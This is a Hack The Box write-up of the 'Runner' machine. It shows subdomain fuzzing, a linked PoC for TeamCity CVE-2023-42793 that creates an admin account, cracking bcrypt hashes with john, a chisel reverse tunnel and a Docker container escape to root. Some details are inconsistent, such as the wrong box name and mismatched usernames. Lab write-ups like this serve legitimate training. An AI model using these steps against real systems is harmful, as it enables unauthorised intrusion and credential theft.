mirror of
https://github.com/cotes2020/chirpy-starter.git
synced 2025-04-21 11:53:27 +10:00
157 lines
4.1 KiB
Markdown
157 lines
4.1 KiB
Markdown
---
|
||
title: HTB - Runner
|
||
date: 2023-06-07 12:17:34 -0400
|
||
categories: [hackthebox , Runner]
|
||
tags: [HackTheBox, Port Forwarding, wfuzz, TeamCity, ssh, john, chisel, portainer, docker,fuzz]
|
||
image:
|
||
path: /assets/img/post/runner/runner-card.png
|
||
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
|
||
alt: Hack the Box - Runner.
|
||
---
|
||
|
||
## Box Info
|
||
|
||
| Name | Bizness |
|
||
| :-------------------- | ---------------: |
|
||
| Release Date | 08 Jun, 2024 |
|
||
| OS | Linux |
|
||
| Rated Difficulty | Medium |
|
||
|
||
## Enumeration
|
||
|
||
### Nmap
|
||
|
||
|
||
|
||
### Resolution DNS
|
||
|
||
```bash
|
||
echo "10.10.11.13 runner.htb | sudo tee -a /etc/hosts
|
||
```
|
||
|
||
### Scanning SubDomain
|
||
|
||
```bash
|
||
wfuzz -c -w /usr/share/wordlists/amass/shubs-subdomains.txt --hc 400,404,403,302 -H "Hosts: FUZZ.runner.htb" -u http://runner.htb -t 100
|
||
```
|
||
|
||
|
||
|
||
```bash
|
||
Whatweb http://runner.htb
|
||
```
|
||
## CVE-2023-42793 for Jet Brains
|
||
|
||
We can see the version of `TeamCity build management server`.
|
||
|
||
|
||
|
||
Googling `Teamcity 2023.05.3` exploit i found a `RCE` vulnerability for it.
|
||
|
||
|
||
|
||
PoC[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793>
|
||
|
||
```bash
|
||
python3 exploit.py -u http://teamcity.runner.htb -n test2 -p test122 -e test2@test.com
|
||
```
|
||
|
||
|
||
|
||
The script exploits to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.
|
||
|
||
|
||
|
||
## SSH
|
||
|
||
Once inside, I enumerate these sections and found in Diagnostics make a backup and storage in a zip file and can we display the folders and found id_rsa.
|
||
|
||
|
||
|
||
We go to download and save for login with ssh.
|
||
|
||
|
||
|
||
Wait.. but dont have a user for login with ssh...
|
||
|
||
|
||
|
||
We also found users and there hashes in same folder.
|
||
|
||
|
||
|
||
## Crack Hash
|
||
|
||
We go to crack the password for it.
|
||
|
||
|
||
|
||
```bash
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt
|
||
```
|
||
Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3]) Remaining 1 password hash Cost 1 (iteration count) is 128 for all loaded hashes Will run 2 OpenMP threads
|
||
|
||
Password: `piper123`
|
||
|
||
Till now we have one id_rsa file, two users (Methew, jhon),password for Methew.
|
||
|
||
`ssh -i id_rsa john@10.10.11.13`
|
||
|
||
|
||
|
||
|
||
|
||
## Port Forwarding
|
||
|
||
```bash
|
||
netstat -nltp
|
||
ss -nltpu
|
||
```
|
||
|
||
127.0.0.1:9000 its potential, I’ll be employing Chisel for port forwarding.
|
||
|
||
|
||
|
||
```bash
|
||
chisel server -p 6150 --reverse (Attack Machine)
|
||
./chisel client 10.10.14.68:6150 R:9000:127.0.0.1:9000 (Victim machine)
|
||
```
|
||
|
||
|
||
|
||
We go to our port 9000
|
||
|
||
|
||
|
||
## Docker
|
||
|
||
Login with credentials `matthew` - `piper123`
|
||
|
||
<https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc>
|
||
|
||
|
||
|
||
## CVE-2024-21626 for Docker
|
||
|
||
|
||
|
||
the path `/proc/self/id/8` is from the [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc) - [PoC - GitHub](https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file)
|
||
|
||
|
||
|
||
Now we go to console
|
||
|
||
|
||
|
||
Execute a `/bin/bash` as root
|
||
|
||
|
||
|
||
Just login as root and look the folder `root` for the flag
|
||
|
||
|
||
|
||
Root
|
||
|
||
#### Source
|
||
[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793> |